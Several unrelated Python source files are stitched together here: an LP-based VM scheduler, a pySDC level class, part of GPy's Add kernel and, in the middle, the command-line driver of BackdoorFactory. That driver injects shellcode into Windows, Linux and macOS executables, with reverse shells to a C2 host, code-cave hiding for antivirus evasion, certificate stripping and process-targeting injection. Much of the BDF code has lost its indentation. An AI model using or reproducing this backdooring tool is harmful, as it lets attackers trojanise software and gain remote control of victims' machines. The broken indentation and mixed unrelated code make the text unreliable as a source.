        """Rescale costs: square each entry's distance to an extremum of the
        first column, with the sign chosen by comparing first vs. last
        column sums.

        NOTE(review): new_cost_matrix aliases cost_matrix, so the input is
        modified in place as well - confirm callers do not rely on the
        original values."""
        new_cost_matrix = cost_matrix
        if not cost_matrix:
            return new_cost_matrix
        first_column = [row[0] for row in cost_matrix]
        last_column = [row[-1] for row in cost_matrix]
        if sum(first_column) < sum(last_column):
            offset = min(first_column)
            sign = 1
        else:
            offset = max(first_column)
            sign = -1
        for i in xrange(len(cost_matrix)):
            for j in xrange(len(cost_matrix[i])):
                new_cost_matrix[i][j] = sign * (
                        (cost_matrix[i][j] - offset) ** 2)
        return new_cost_matrix
    def solve(self, hosts, filter_properties):
        """This method returns a list of tuples - (host, instance_uuid)
        that are returned by the solver. Here the assumption is that
        all instance_uuids have the same requirement as specified in
        filter_properties.

        Raises SolverFailed when the LP terminates neither 'Optimal'
        nor 'Infeasible'.
        """
        host_instance_combinations = []
        num_instances = filter_properties['num_instances']
        num_hosts = len(hosts)
        instance_uuids = filter_properties.get('instance_uuids') or [
                '(unknown_uuid)' + str(i) for i in xrange(num_instances)]
        LOG.debug(_("All Hosts: %s") % [h.host for h in hosts])
        for host in hosts:
            LOG.debug(_("Host state: %s") % host)
        # Create dictionaries mapping temporary host/instance keys to
        # hosts/instance_uuids. These temorary keys are to be used in the
        # solving process since we need a convention of lp variable names.
        host_keys = ['Host' + str(i) for i in xrange(num_hosts)]
        host_key_map = dict(zip(host_keys, hosts))
        instance_keys = ['InstanceNum' + str(i) for i in xrange(num_instances)]
        instance_key_map = dict(
                zip(instance_keys, xrange(1, num_instances + 1)))
        # this is currently hard-coded and should match variable names
        # (the 'HI_<host>_<instance>' scheme built by PulpVariables).
        host_instance_matrix_idx_map = {}
        for i in xrange(len(host_keys)):
            for j in xrange(len(instance_keys)):
                var_name = 'HI_' + host_keys[i] + '_' + instance_keys[j]
                host_instance_matrix_idx_map[var_name] = (i, j)
        # Create the 'variables' to contain the referenced variables.
        self.variables.populate_variables(host_keys, instance_keys)
        # Create the 'prob' variable to contain the problem data.
        prob = pulp.LpProblem("Host Instance Scheduler Problem",
                              constants.LpMinimize)
        # Get costs and constraints and formulate the linear problem.
        # Add costs.
        cost_objects = [cost() for cost in self.cost_classes]
        cost_coeff_matrix = [[0 for j in xrange(num_instances)]
                            for i in xrange(num_hosts)]
        for cost_object in cost_objects:
            var_list, coeff_list = cost_object.get_components(
                    self.variables, hosts, filter_properties)
            for i in xrange(len(var_list)):
                var = var_list[i]
                coeff = coeff_list[i]
                hidx, iidx = host_instance_matrix_idx_map[var.name]
                cost_coeff_matrix[hidx][iidx] += (
                        coeff * cost_object.cost_multiplier())
        cost_coeff_matrix = self._calculate_host_instance_cost_matrix(
                cost_coeff_matrix)
        # NOTE(review): var_list below refers to the LAST cost object's
        # component list (leaked from the loop above) and raises NameError
        # when cost_classes is empty - confirm whether intended.
        cost_coeff_array = []
        for var in var_list:
            hidx, iidx = host_instance_matrix_idx_map[var.name]
            cost_coeff_array.append(cost_coeff_matrix[hidx][iidx])
        cost_variables = var_list
        cost_coefficients = cost_coeff_array
        if cost_variables:
            prob += (pulp.lpSum([cost_coefficients[i] * cost_variables[i]
                    for i in xrange(len(cost_variables))]), "Sum_Costs")
        # Add constraints.
        constraint_objects = [constraint()
                              for constraint in self.constraint_classes]
        for constraint_object in constraint_objects:
            vars_list, coeffs_list, consts_list, ops_list = (
                    constraint_object.get_components(self.variables, hosts,
                    filter_properties))
            LOG.debug(_("coeffs of %(name)s is: %(value)s") %
                      {"name": constraint_object.__class__.__name__,
                      "value": coeffs_list})
            for i in xrange(len(ops_list)):
                operation = self._get_operation(ops_list[i])
                prob += (
                        operation(pulp.lpSum([coeffs_list[i][j] *
                        vars_list[i][j] for j in xrange(len(vars_list[i]))]),
                        consts_list[i]), "Costraint_Name_%s" %
                        constraint_object.__class__.__name__ + "_No._%s" % i)
        # The problem is solved using PULP's choice of Solver.
        prob.solve(pulp_solver_classes.PULP_CBC_CMD(
                maxSeconds=CONF.solver_scheduler.pulp_solver_timeout_seconds))
        # Create host-instance tuples from the solutions.
        if pulp.LpStatus[prob.status] == 'Optimal':
            num_insts_on_host = {}
            for v in prob.variables():
                if v.name.startswith('HI'):
                    # lstrip('HI') strips the leading 'H'/'I' characters of
                    # the 'HI_' prefix, then lstrip('_') removes the
                    # separator, leaving '<host_key>_<instance_key>'.
                    (host_key, instance_key) = v.name.lstrip('HI').lstrip(
                            '_').split('_')
                    if v.varValue == 1:
                        num_insts_on_host[host_key] = (
                                instance_key_map[instance_key])
            instances_iter = iter(instance_uuids)
            # Assign uuids to hosts in host_keys order, consuming as many
            # uuids per host as the solution placed there.
            for host_key in host_keys:
                num_insts_on_this_host = num_insts_on_host.get(host_key, 0)
                for i in xrange(num_insts_on_this_host):
                    host_instance_combinations.append(
                            (host_key_map[host_key], instances_iter.next()))
        elif pulp.LpStatus[prob.status] == 'Infeasible':
            LOG.warn(_("Pulp solver didnot find optimal solution! reason: %s")
                    % pulp.LpStatus[prob.status])
            host_instance_combinations = []
        else:
            LOG.warn(_("Pulp solver didnot find optimal solution! reason: %s")
                    % pulp.LpStatus[prob.status])
            raise exception.SolverFailed(reason=pulp.LpStatus[prob.status])
        return host_instance_combinations
| |
#!/usr/bin/env python
'''
BackdoorFactory (BDF) v3 - FOUNTAINPATCH
Many thanks to Ryan O'Neill --ryan 'at' codeslum <d ot> org--
Without him, I would still be trying to do stupid things
with the elf format.
Also thanks to Silvio Cesare with his 1998 paper
(http://vxheaven.org/lib/vsc01.html) which these ELF patching
techniques are based on.
Special thanks to Travis Morrow for poking holes in my ideas.
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import sys
import os
import signal
import time
from random import choice
from optparse import OptionParser
from pebin import pebin
from elfbin import elfbin
from machobin import machobin
def signal_handler(signal, frame):
    """SIGINT handler: print an exit notice and terminate cleanly."""
    print '\nProgram Exit'
    sys.exit(0)
class bdfMain():
version = """\
Version: 3.0.3
"""
author = """\
Author: Joshua Pitts
Email: the.midnite.runr[-at ]gmail<d o-t>com
Twitter: @midnite_runr
IRC: freenode.net #BDFactory
"""
#ASCII ART
menu = ["-.(`-') (`-') _ <-"
".(`-') _(`-') (`-')\n"
"__( OO) (OO ).-/ _ __( OO)"
"( (OO ).-> .-> .-> <-.(OO ) \n"
"'-'---.\ / ,---. \-,-----.'-'. ,--"
".\ .'_ (`-')----. (`-')----. ,------,) \n"
"| .-. (/ | \ /`.\ | .--./| .' /"
"'`'-..__)( OO).-. '( OO).-. '| /`. ' \n"
"| '-' `.) '-'|_.' | /_) (`-')| /)"
"| | ' |( _) | | |( _) | | || |_.' | \n"
"| /`'. |(| .-. | || |OO )| . ' |"
" | / : \| |)| | \| |)| || . .' \n"
"| '--' / | | | |(_' '--'\| |\ \|"
" '-' / ' '-' ' ' '-' '| |\ \ \n"
"`------' `--' `--' `-----'`--' '--'"
"`------' `-----' `-----' `--' '--' \n"
" (`-') _ (`-') "
" (`-') \n"
" <-. (OO ).-/ _ ( OO).-> "
" .-> <-.(OO ) .-> \n"
"(`-')-----./ ,---. \-,-----./ '._"
" (`-')----. ,------,) ,--.' ,-. \n"
"(OO|(_\---'| \ /`.\ | .--./|'--...__)"
"( OO).-. '| /`. '(`-')'.' / \n"
" / | '--. '-'|_.' | /_) (`-')`--. .--'"
"( _) | | || |_.' |(OO \ / \n"
" \_) .--'(| .-. | || |OO ) | | "
" \| |)| || . .' | / /) \n"
" `| |_) | | | |(_' '--'\ | | "
" ' '-' '| |\ \ `-/ /` \n"
" `--' `--' `--' `-----' `--' "
" `-----' `--' '--' `--' \n",
"__________ "
" __ .___ \n"
"\______ \_____ ____ "
"| | __ __| _/____ ___________ \n"
" | | _/\__ \ _/ ___\|"
" |/ // __ |/ _ \ / _ \_ __ \ \n"
" | | \ / __ \\\\ \__"
"_| </ /_/ ( <_> | <_> ) | \/\n"
" |______ /(____ /\___ >"
"__|_ \____ |\____/ \____/|__| \n"
" \/ \/ \/"
" \/ \/ \n"
"___________ "
"__ \n"
"\_ _____/____ _____/"
" |_ ___________ ___.__. \n"
" | __) \__ \ _/ ___\ "
" __\/ _ \_ __ < | | \n"
" | \ / __ \\\\ \__"
"_| | ( <_> ) | \/\___ | \n"
" \___ / (____ /\___ >_"
"_| \____/|__| / ____| \n"
" \/ \/ \/ "
" \/ \n",
" ____ ____ ______ "
" __ \n"
" / __ )/ __ \/ ____/___ "
"______/ /_____ _______ __\n"
" / __ / / / / /_ / __ `/"
" ___/ __/ __ \/ ___/ / / /\n"
" / /_/ / /_/ / __/ / /_/ /"
" /__/ /_/ /_/ / / / /_/ /\n"
"/_____/_____/_/ \__,_/"
"\___/\__/\____/_/ \__, /\n"
" "
" /____/\n"]
signal.signal(signal.SIGINT, signal_handler)
parser = OptionParser()
parser.add_option("-f", "--file", dest="FILE", action="store",
type="string",
help="File to backdoor")
parser.add_option("-s", "--shell", default="show", dest="SHELL",
action="store", type="string",
help="Payloads that are available for use."
" Use 'show' to see payloads."
)
parser.add_option("-H", "--hostip", default=None, dest="HOST",
action="store", type="string",
help="IP of the C2 for reverse connections.")
parser.add_option("-P", "--port", default=None, dest="PORT",
action="store", type="int",
help="The port to either connect back to for reverse "
"shells or to listen on for bind shells")
parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING",
default=False, action="store_true",
help="Select this options if you want to use code cave"
" jumping to further hide your shellcode in the binary."
)
parser.add_option("-a", "--add_new_section", default=False,
dest="ADD_SECTION", action="store_true",
help="Mandating that a new section be added to the "
"exe (better success) but less av avoidance")
parser.add_option("-U", "--user_shellcode", default=None,
dest="SUPPLIED_SHELLCODE", action="store",
help="User supplied shellcode, make sure that it matches"
" the architecture that you are targeting."
)
parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES",
action="store_true",
help="The cave flag will find code caves that "
"can be used for stashing shellcode. "
"This will print to all the code caves "
"of a specific size."
"The -l flag can be use with this setting.")
parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN",
action="store", type="int",
help="For use with -c to help find code "
"caves of different sizes")
parser.add_option("-o", "--output-file", default=None, dest="OUTPUT",
action="store", type="string",
help="The backdoor output file")
parser.add_option("-n", "--section", default="sdata", dest="NSECTION",
action="store", type="string",
help="New section name must be "
"less than seven characters")
parser.add_option("-d", "--directory", dest="DIR", action="store",
type="string",
help="This is the location of the files that "
"you want to backdoor. "
"You can make a directory of file backdooring faster by "
"forcing the attaching of a codecave "
"to the exe by using the -a setting.")
parser.add_option("-w", "--change_access", default=True,
dest="CHANGE_ACCESS", action="store_false",
help="This flag changes the section that houses "
"the codecave to RWE. Sometimes this is necessary. "
"Enabled by default. If disabled, the "
"backdoor may fail.")
parser.add_option("-i", "--injector", default=False, dest="INJECTOR",
action="store_true",
help="This command turns the backdoor factory in a "
"hunt and shellcode inject type of mechanism. Edit "
"the target settings in the injector module.")
parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX",
action="store", type="string",
help="For use with injector, places a suffix"
" on the original file for easy recovery")
parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL",
default=False, action="store_true",
help="For use with injector module. This command"
" deletes the original file. Not for use in production "
"systems. *Author not responsible for stupid uses.*")
parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0,
type="int", action="store",
help="Starting point on disk offset, in bytes. "
"Some authors want to obfuscate their on disk offset "
"to avoid reverse engineering, if you find one of those "
"files use this flag, after you find the offset.")
parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK",
default=False, action="store_true",
help="To determine if the file is supported by BDF prior"
" to backdooring the file. For use by itself or with "
"verbose. This check happens automatically if the "
"backdooring is attempted."
)
parser.add_option("-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true",
help="Future use, to help determine smallest shellcode possible in a PE file"
)
parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true",
help="Kills the banner."
)
parser.add_option("-v", "--verbose", default=False, dest="VERBOSE",
action="store_true",
help="For debug information output.")
parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL",
type='string',
action="store", help="ALL, x86, or x64 type binaries only. Default=ALL")
parser.add_option("-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false",
help="Allows for the overwriting of the pointer to the PE certificate table"
" effectively removing the certificate from the binary for all intents"
" and purposes."
)
parser.add_option("-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true",
help="Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'"
". If this string is included in the binary, it must run as system/admin. Doing this "
"slows patching speed significantly."
)
parser.add_option("-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false",
help="Use this setting if you DON'T want to patch DLLs. Patches by default."
)
parser.add_option("-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store",
help="For MACH-O format. If fat file, focus on which arch to patch. Default "
"is x64. To force x86 use -F x86, to force both archs use -F ALL."
)
parser.add_option("-B", "--beacon", dest="BEACON", default=15, action="store", type="int",
help="For payloads that have the ability to beacon out, set the time in secs"
)
parser.add_option("-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store",
type="string", help="Patching methods for PE files, 'manual' and 'automatic'")
(options, args) = parser.parse_args()
def basicDiscovery(FILE):
    """Return the executable format of FILE based on its first four bytes.

    Args:
        FILE: path to the binary to inspect.

    Returns:
        'PE', 'ELF' or 'MACHO' for recognized formats, None otherwise.
    """
    # Mach-O magic numbers: 64-bit LE, fat/universal, 32-bit LE.  Byte
    # literals behave identically under Python 2 (where bytes is str)
    # and are required for correctness under Python 3.
    macho_supported = [b'\xcf\xfa\xed\xfe', b'\xca\xfe\xba\xbe',
                       b'\xce\xfa\xed\xfe',
                       ]
    # 'with' guarantees the handle is closed even if read() raises.
    with open(FILE, 'rb') as testBinary:
        header = testBinary.read(4)
    if b'MZ' in header:
        return 'PE'
    elif b'ELF' in header:
        # ELF magic is \x7fELF, so a substring test on the first 4 bytes works.
        return 'ELF'
    elif header in macho_supported:
        return "MACHO"
    else:
        # BUGFIX: this message used to be a bare string literal (a no-op
        # expression statement); it was clearly meant to be printed.
        print('Only support ELF, PE, and MACH-O file formats')
        return None
# Show a randomly chosen ASCII-art banner unless suppressed with
# -q/--no_banner (choice/menu/author/version come from earlier in the file).
if options.NO_BANNER is False:
    print choice(menu)
    print author
    print version
    time.sleep(1)
else:
    # Minimal banner when -q is given.
    print "\t Backdoor Factory"
    print author
    print version
if options.DIR:
for root, subFolders, files in os.walk(options.DIR):
for _file in files:
options.FILE = os.path.join(root, _file)
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
if options.SUPPORT_CHECK is True:
if os.path.isfile(options.FILE):
is_supported = False
print "file", options.FILE
try:
is_supported = supported_file.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % options.FILE
if is_supported is False or is_supported is None:
print "%s is not supported." % options.FILE
#continue
else:
print "%s is supported." % options.FILE
# if supported_file.flItms['runas_admin'] is True:
# print "%s must be run as admin." % options.FILE
print "*" * 50
if options.SUPPORT_CHECK is True:
sys.exit()
print ("You are going to backdoor the following "
"items in the %s directory:"
% options.DIR)
dirlisting = os.listdir(options.DIR)
for item in dirlisting:
print " {0}".format(item)
answer = raw_input("Do you want to continue? (yes/no) ")
if 'yes' in answer.lower():
for item in dirlisting:
#print item
print "*" * 50
options.File = options.DIR + '/' + item
if os.path.isdir(options.FILE) is True:
print "Directory found, continuing"
continue
print ("backdooring file %s" % item)
result = None
is_supported = basicDiscovery(options.FILE)
try:
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_pe()
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_elf()
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
supported_file.OUTPUT = None
supported_file.output_options()
result = supported_file.patch_macho()
if result is None:
print 'Not Supported. Continuing'
continue
else:
print ("[*] File {0} is in backdoored "
"directory".format(supported_file.FILE))
except Exception as e:
print "DIR ERROR", str(e)
else:
print("Goodbye")
sys.exit()
# -i/--injector mode (PE only): patch binaries backing running processes.
# NOTE(review): unlike the other pebin() call sites, this argument list has
# no CAVE_MINER entry -- presumably matching a different pebin signature
# default; confirm against the pebin constructor.
if options.INJECTOR is True:
    supported_file = pebin(options.FILE,
                           options.OUTPUT,
                           options.SHELL,
                           options.NSECTION,
                           options.DISK_OFFSET,
                           options.ADD_SECTION,
                           options.CAVE_JUMPING,
                           options.PORT,
                           options.HOST,
                           options.SUPPLIED_SHELLCODE,
                           options.INJECTOR,
                           options.CHANGE_ACCESS,
                           options.VERBOSE,
                           options.SUPPORT_CHECK,
                           options.SHELL_LEN,
                           options.FIND_CAVES,
                           options.SUFFIX,
                           options.DELETE_ORIGINAL,
                           options.IMAGE_TYPE,
                           options.ZERO_CERT,
                           options.CHECK_ADMIN,
                           options.PATCH_DLL,
                           options.PATCH_METHOD
                           )
    supported_file.injector()
    sys.exit()
if not options.FILE:
parser.print_help()
sys.exit()
#OUTPUT = output_options(options.FILE, options.OUTPUT)
is_supported = basicDiscovery(options.FILE)
if is_supported is "PE":
supported_file = pebin(options.FILE,
options.OUTPUT,
options.SHELL,
options.NSECTION,
options.DISK_OFFSET,
options.ADD_SECTION,
options.CAVE_JUMPING,
options.PORT,
options.HOST,
options.SUPPLIED_SHELLCODE,
options.INJECTOR,
options.CHANGE_ACCESS,
options.VERBOSE,
options.SUPPORT_CHECK,
options.SHELL_LEN,
options.FIND_CAVES,
options.SUFFIX,
options.DELETE_ORIGINAL,
options.CAVE_MINER,
options.IMAGE_TYPE,
options.ZERO_CERT,
options.CHECK_ADMIN,
options.PATCH_DLL,
options.PATCH_METHOD
)
elif is_supported is "ELF":
supported_file = elfbin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.FIND_CAVES,
options.SHELL_LEN,
options.SUPPLIED_SHELLCODE,
options.IMAGE_TYPE
)
elif is_supported is "MACHO":
supported_file = machobin(options.FILE,
options.OUTPUT,
options.SHELL,
options.HOST,
options.PORT,
options.SUPPORT_CHECK,
options.SUPPLIED_SHELLCODE,
options.FAT_PRIORITY,
options.BEACON
)
else:
print "Not supported."
sys.exit()
result = supported_file.run_this()
if result is True and options.SUPPORT_CHECK is False:
print "File {0} is in the 'backdoored' directory".format(os.path.basename(supported_file.OUTPUT))
#END BDF MAIN
# Script entry point; bdfMain is defined earlier in this file.
if __name__ == "__main__":
    bdfMain()
| |
import copy as cp
import logging
from pySDC import Stats as statclass
class level():
    """
    Level class containing all management functionality for a single level

    A level contains all data structures, types and objects to perform sweeps on this particular level. It does not
    know about other levels.

    Attributes:
        __sweep: a private instance of a sweeper class (accessed via property)
        __prob: a private instance of a problem class (accessed via property)
        params: parameter object containing the custom parameters passed by the user
        status: status object
        uend: dof values at the right end point of the interval
        u: dof values at the nodes (+uold for saving data during restriction)
        f: RHS values at the nodes (+fold for saving data during restriction)
        tau: FAS correction, allocated via step class if necessary
        id: custom string naming this level
        __step: link to the step where this level is part of (set from the outside by the step)
        __hooks: a private instance of a hooks class
        __slots__: list of attributes to avoid accidental creation of new class attributes
    """

    class cstatus():
        """
        Helper class for status objects

        Attributes:
            residual: current residual
            unlocked: indicates if the data on this level can be used
            updated: indicates if the data on this level is new
        """

        def __init__(self):
            """
            Initialization routine
            """
            self.residual = None  # FIXME: isn't that obsolete?
            self.unlocked = False
            self.updated = False

    # FIX: 'id' used to be listed twice in this tuple; the duplicate entry
    # was redundant.  Private names here are name-mangled by the class
    # machinery, matching the mangled self.__xxx assignments below.
    __slots__ = ('__prob', '__sweep', 'uend', 'u', 'uold', 'f', 'fold', 'tau', 'status', 'params', 'id',
                 '__step', '__tag', '__hooks')

    def __init__(self, problem_class, problem_params, dtype_u, dtype_f, sweeper_class,
                 sweeper_params, level_params, hook_class, id):
        """
        Initialization routine

        Args:
            problem_class: problem class
            problem_params: parameters for the problem to be initialized
            dtype_u: data type of the dofs
            dtype_f: data type of the RHS
            sweeper_class: sweeper class
            sweeper_params: parameters for the sweeper (contains collocation)
            level_params: parameters given by the user, will be added as attributes
            hook_class: class to add hooks (e.g. for output and diag)
            id: custom string naming this level
        """

        # short helper class to add params as attributes
        class pars():
            def __init__(self, params):
                defaults = dict()
                # residual tolerance; 0.0 effectively disables the check
                defaults['restol'] = 0.0
                for k, v in defaults.items():
                    setattr(self, k, v)
                # user-supplied values override the defaults
                for k, v in params.items():
                    setattr(self, k, v)

        # instantiate sweeper, problem and hooks
        self.__sweep = sweeper_class(sweeper_params)
        self.__prob = problem_class(problem_params, dtype_u, dtype_f)
        self.__hooks = hook_class()

        # set level parameters and status
        self.params = pars(level_params)
        self.status = level.cstatus()

        # empty data at the nodes, the right end point and tau
        # (num_nodes + 1 entries: index 0 holds the left end point)
        self.uend = None
        self.u = [None] * (self.sweep.coll.num_nodes + 1)
        self.uold = [None] * (self.sweep.coll.num_nodes + 1)
        self.f = [None] * (self.sweep.coll.num_nodes + 1)
        self.fold = [None] * (self.sweep.coll.num_nodes + 1)
        self.tau = None

        # set name
        self.id = id

        # dummy step variable, will be defined by registration at step
        self.__step = None

        # pass this level to the sweeper/hooks for easy access; their setters
        # are private, hence the explicit name-mangled attribute access
        self.sweep._sweeper__set_level(self)
        self.hooks._hooks__set_level(self)

        self.__tag = None

    def reset_level(self):
        """
        Routine to clean-up the level for the next time step
        """
        # reset status
        self.status = level.cstatus()
        # all data back to None
        self.uend = None
        self.u = [None] * (self.sweep.coll.num_nodes + 1)
        self.uold = [None] * (self.sweep.coll.num_nodes + 1)
        self.f = [None] * (self.sweep.coll.num_nodes + 1)
        self.fold = [None] * (self.sweep.coll.num_nodes + 1)

    def __add_tau(self):
        """
        Routine to add memory for the FAS correction

        This will be called by the step if this level is not the finest one.

        Raises:
            RuntimeError: if tau has already been allocated for this level
        """
        if self.tau is None:
            self.tau = [None] * self.sweep.coll.num_nodes
        else:
            # FIX: used to be 'raise WTF' (an undefined name, i.e. a
            # NameError placeholder).  tau must only be allocated once.
            raise RuntimeError('tau is already allocated for level %s' % self.id)

    def __set_step(self, S):
        """
        Defines the step this level belongs to (no explicit setter)
        """
        self.__step = S

    @property
    def sweep(self):
        """
        Getter for the sweeper
        """
        return self.__sweep

    @property
    def hooks(self):
        """
        Getter for the hooks
        """
        return self.__hooks

    @property
    def prob(self):
        """
        Getter for the problem
        """
        return self.__prob

    @property
    def time(self):
        """
        Meta-getter for the current time (only passing the step's time)
        """
        return self.__step.status.time

    @property
    def dt(self):
        """
        Meta-getter for the step size (only passing the step's step size)

        NOTE: this property used to be defined twice (identically); the
        duplicate definition has been removed.
        """
        return self.__step.status.dt

    @property
    def iter(self):
        """
        Meta-getter for the iteration (only passing the step's iteration)
        """
        return self.__step.status.iter

    @property
    def tag(self):
        """
        Getter for tag

        Returns:
            tag
        """
        return self.__tag

    @tag.setter
    def tag(self, t):
        """
        Setter for tag

        Args:
            t: new tag
        """
        self.__tag = t
| |
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import numpy as np
import itertools
from paramz.caching import Cache_this
from .kern import CombinationKernel, Kern
from functools import reduce
class Add(CombinationKernel):
    """
    Add given list of kernels together.
    propagates gradients through.

    This kernel will take over the active dims of it's subkernels passed in.

    NOTE: The subkernels will be copies of the original kernels, to prevent
    unexpected behavior.
    """
    def __init__(self, subkerns, name='sum'):
        # Flatten nested Add kernels and copy every part, so the summands are
        # independent of the caller's kernel objects.
        _newkerns = []
        for kern in subkerns:
            if isinstance(kern, Add):
                for part in kern.parts:
                    _newkerns.append(part.copy())
            else:
                _newkerns.append(kern.copy())
        super(Add, self).__init__(_newkerns, name)
        self._exact_psicomp = self._check_exact_psicomp()

    def _check_exact_psicomp(self):
        """Return True if the psi statistics of this sum can be computed
        exactly, i.e. the parts are at most one RBF-or-Linear, one Bias and
        one White kernel and nothing else."""
        from .. import RBF, Linear, Bias, White
        n_kerns = len(self.parts)
        n_rbf = len([k for k in self.parts if isinstance(k, RBF)])
        n_linear = len([k for k in self.parts if isinstance(k, Linear)])
        n_bias = len([k for k in self.parts if isinstance(k, Bias)])
        n_white = len([k for k in self.parts if isinstance(k, White)])
        n_others = n_kerns - n_rbf - n_linear - n_bias - n_white
        if n_rbf+n_linear<=1 and n_bias<=1 and n_white<=1 and n_others==0:
            return True
        else:
            return False

    @Cache_this(limit=3, force_kwargs=['which_parts'])
    def K(self, X, X2=None, which_parts=None):
        """
        Add all kernels together.
        If a list of parts (of this kernel!) `which_parts` is given, only
        the parts of the list are taken to compute the covariance.
        """
        if which_parts is None:
            which_parts = self.parts
        elif not isinstance(which_parts, (list, tuple)):
            # if only one part is given
            which_parts = [which_parts]
        return reduce(np.add, (p.K(X, X2) for p in which_parts))

    @Cache_this(limit=3, force_kwargs=['which_parts'])
    def Kdiag(self, X, which_parts=None):
        """Diagonal of the summed covariance (sum of the parts' diagonals)."""
        if which_parts is None:
            which_parts = self.parts
        elif not isinstance(which_parts, (list, tuple)):
            # if only one part is given
            which_parts = [which_parts]
        return reduce(np.add, (p.Kdiag(X) for p in which_parts))

    def update_gradients_full(self, dL_dK, X, X2=None):
        """Propagate dL_dK to every (non-fixed) part."""
        [p.update_gradients_full(dL_dK, X, X2) for p in self.parts if not p.is_fixed]

    def update_gradients_diag(self, dL_dK, X):
        """Propagate the diagonal gradient to every part."""
        [p.update_gradients_diag(dL_dK, X) for p in self.parts]

    def gradients_X(self, dL_dK, X, X2=None):
        """Compute the gradient of the objective function with respect to X.

        :param dL_dK: An array of gradients of the objective function with respect to the covariance function.
        :type dL_dK: np.ndarray (num_samples x num_inducing)
        :param X: Observed data inputs
        :type X: np.ndarray (num_samples x input_dim)
        :param X2: Observed data inputs (optional, defaults to X)
        :type X2: np.ndarray (num_inducing x input_dim)"""
        target = np.zeros(X.shape)
        [target.__iadd__(p.gradients_X(dL_dK, X, X2)) for p in self.parts]
        return target

    def gradients_X_diag(self, dL_dKdiag, X):
        """Sum of the parts' diagonal gradients wrt X."""
